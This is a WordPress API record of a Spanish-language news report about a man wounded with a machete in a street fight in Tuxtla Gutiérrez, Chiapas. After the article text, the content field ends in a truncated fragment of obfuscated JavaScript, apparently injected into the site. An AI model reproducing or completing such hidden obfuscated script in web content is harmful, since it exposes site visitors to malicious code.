{"id":6505,"date":"2022-11-10T00:10:55","date_gmt":"2022-11-10T00:10:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6505"},"modified":"2022-11-10T00:10:56","modified_gmt":"2022-11-10T00:10:56","slug":"atacan-a-machetazos-a-joven-en-las-granjas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6505","title":{"rendered":"Atacan a machetazos a joven en Las Granjas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221109-WA0021-1024x768.jpg\" alt=\"\" class=\"wp-image-6506\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221109-WA0021-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221109-WA0021-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221109-WA0021-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221109-WA0021-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221109-WA0021.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 9 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un hombre que particip\u00f3 en una ri\u00f1a fue herido a machetazos este mi\u00e9rcoles en la Colonia Las Granjas de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el joven qued\u00f3 tendido en el suelo sobre la Calle Michoac\u00e1n y Avenida Zacatecas por lo que fue auxiliado por los vecinos que llamaron a los n\u00fameros de emergencias para auxiliar al herido.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos que prestaron los servicios prehospitalarios al hombre que ya hab\u00eda perdido mucha sangre por lo que fue trasladado a un nosocomio para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Sobre los agresores nada se supo, tampoco los generales del herido pues estaba casi inconsciente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 9 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Un hombre que particip\u00f3 en una ri\u00f1a fue herido a machetazos este mi\u00e9rcoles en la Colonia Las Granjas de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, el joven qued\u00f3 tendido en el suelo sobre la Calle Michoac\u00e1n y Avenida Zacatecas por lo que fue &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6506,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-6505","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6505","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6505"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6505\/revisions"}],"predecessor-version":[{"id":6507,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6505\/revisions\/6507"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6506"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}